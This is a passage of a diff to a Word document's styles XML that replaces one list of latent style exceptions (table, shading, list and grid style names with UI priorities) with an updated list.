-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table 3D effects 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table 3D effects 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table 3D effects 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Contemporary"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Elegant"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Professional"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Subtle 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Subtle 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Web 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Web 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Web 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Balloon Text"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Grid"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="0" w:semiHidden="0" w:name="Table Theme"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 1"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 2"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 3"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 4"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 5"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="60" w:semiHidden="0" w:name="Light Shading Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="61" w:semiHidden="0" w:name="Light List Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="62" w:semiHidden="0" w:name="Light Grid Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="63" w:semiHidden="0" w:name="Medium Shading 1 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="64" w:semiHidden="0" w:name="Medium Shading 2 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="65" w:semiHidden="0" w:name="Medium List 1 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="66" w:semiHidden="0" w:name="Medium List 2 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="67" w:semiHidden="0" w:name="Medium Grid 1 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="68" w:semiHidden="0" w:name="Medium Grid 2 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="69" w:semiHidden="0" w:name="Medium Grid 3 Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="70" w:semiHidden="0" w:name="Dark List Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="71" w:semiHidden="0" w:name="Colorful Shading Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="72" w:semiHidden="0" w:name="Colorful List Accent 6"/>
-    <w:lsdException w:unhideWhenUsed="0" w:uiPriority="73" w:semiHidden="0" w:name="Colorful Grid Accent 6"/>
+  <w:latentStyles w:defLockedState="0" w:defUIPriority="0" w:defSemiHidden="0" w:defUnhideWhenUsed="0" w:defQFormat="0" w:count="376">
+    <w:lsdException w:name="Normal" w:qFormat="1"/>
+    <w:lsdException w:name="heading 1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 2" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 3" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 4" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 5" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 6" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 7" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 8" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="heading 9" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="caption" w:semiHidden="1" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Title" w:qFormat="1"/>
+    <w:lsdException w:name="Default Paragraph Font" w:semiHidden="1"/>
+    <w:lsdException w:name="Subtitle" w:qFormat="1"/>
+    <w:lsdException w:name="Strong" w:qFormat="1"/>
+    <w:lsdException w:name="Emphasis" w:qFormat="1"/>
+    <w:lsdException w:name="HTML Top of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="HTML Bottom of Form" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Normal Table" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No List" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 1" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 2" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Outline List 3" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Simple 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Classic 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Colorful 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Columns 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Grid 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 4" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 5" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 6" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 7" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table List 8" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table 3D effects 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Contemporary" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Elegant" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Professional" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Subtle 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 1" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 2" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Web 3" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Table Theme" w:semiHidden="1" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Placeholder Text" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="No Spacing" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Light Shading" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 1" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 1" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 1" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 1" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 1" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 1" w:uiPriority="65"/>
+    <w:lsdException w:name="Revision" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="List Paragraph" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Quote" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Intense Quote" w:semiHidden="1" w:uiPriority="99" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="Medium List 2 Accent 1" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 1" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 1" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 1" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 1" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 1" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 1" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 1" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 2" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 2" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 2" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 2" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 2" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 2" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 2" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 2" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 2" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 2" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 2" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 2" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 2" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 2" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 3" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 3" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 3" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 3" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 3" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 3" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 3" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 3" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 3" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 3" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 3" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 3" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 3" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 3" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 4" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 4" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 4" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 4" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 4" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 4" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 4" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 4" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 4" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 4" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 4" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 4" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 4" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 4" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 5" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 5" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 5" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 5" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 5" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 5" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 5" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 5" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 5" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 5" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 5" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 5" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 5" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 5" w:uiPriority="73"/>
+    <w:lsdException w:name="Light Shading Accent 6" w:uiPriority="60"/>
+    <w:lsdException w:name="Light List Accent 6" w:uiPriority="61"/>
+    <w:lsdException w:name="Light Grid Accent 6" w:uiPriority="62"/>
+    <w:lsdException w:name="Medium Shading 1 Accent 6" w:uiPriority="63"/>
+    <w:lsdException w:name="Medium Shading 2 Accent 6" w:uiPriority="64"/>
+    <w:lsdException w:name="Medium List 1 Accent 6" w:uiPriority="65"/>
+    <w:lsdException w:name="Medium List 2 Accent 6" w:uiPriority="66"/>
+    <w:lsdException w:name="Medium Grid 1 Accent 6" w:uiPriority="67"/>
+    <w:lsdException w:name="Medium Grid 2 Accent 6" w:uiPriority="68"/>
+    <w:lsdException w:name="Medium Grid 3 Accent 6" w:uiPriority="69"/>
+    <w:lsdException w:name="Dark List Accent 6" w:uiPriority="70"/>
+    <w:lsdException w:name="Colorful Shading Accent 6" w:uiPriority="71"/>
+    <w:lsdException w:name="Colorful List Accent 6" w:uiPriority="72"/>
+    <w:lsdException w:name="Colorful Grid Accent 6" w:uiPriority="73"/>
+    <w:lsdException w:name="Subtle Emphasis" w:uiPriority="19" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Emphasis" w:uiPriority="21" w:qFormat="1"/>
+    <w:lsdException w:name="Subtle Reference" w:uiPriority="31" w:qFormat="1"/>
+    <w:lsdException w:name="Intense Reference" w:uiPriority="32" w:qFormat="1"/>
+    <w:lsdException w:name="Book Title" w:uiPriority="33" w:qFormat="1"/>
+    <w:lsdException w:name="Bibliography" w:semiHidden="1" w:uiPriority="37" w:unhideWhenUsed="1"/>
+    <w:lsdException w:name="TOC Heading" w:semiHidden="1" w:uiPriority="39" w:unhideWhenUsed="1" w:qFormat="1"/>
+    <w:lsdException w:name="Plain Table 1" w:uiPriority="41"/>
+    <w:lsdException w:name="Plain Table 2" w:uiPriority="42"/>
+    <w:lsdException w:name="Plain Table 3" w:uiPriority="43"/>
+    <w:lsdException w:name="Plain Table 4" w:uiPriority="44"/>
+    <w:lsdException w:name="Plain Table 5" w:uiPriority="45"/>
+    <w:lsdException w:name="Grid Table Light" w:uiPriority="40"/>
+    <w:lsdException w:name="Grid Table 1 Light" w:uiPriority="46"/>
+    <w:lsdException w:name="Grid Table 2" w:uiPriority="47"/>
+    <w:lsdException w:name="Grid Table 3" w:uiPriority="48"/>
+    <w:lsdException w:name="Grid Table 4" w:uiPriority="49"/>
+    <w:lsdException w:name="Grid Table 5 Dark" w:uiPriority="50"/>
+    <w:lsdException w:name="Grid Table 6 Colorful" w:uiPriority="51"/>
+    <w:lsdException w:name="Grid Table 7 Colorful" w:uiPriority="52"/>
+    <w:lsdException w:name="Grid Table 1 Light Accent 1" w:uiPriority="46"/>
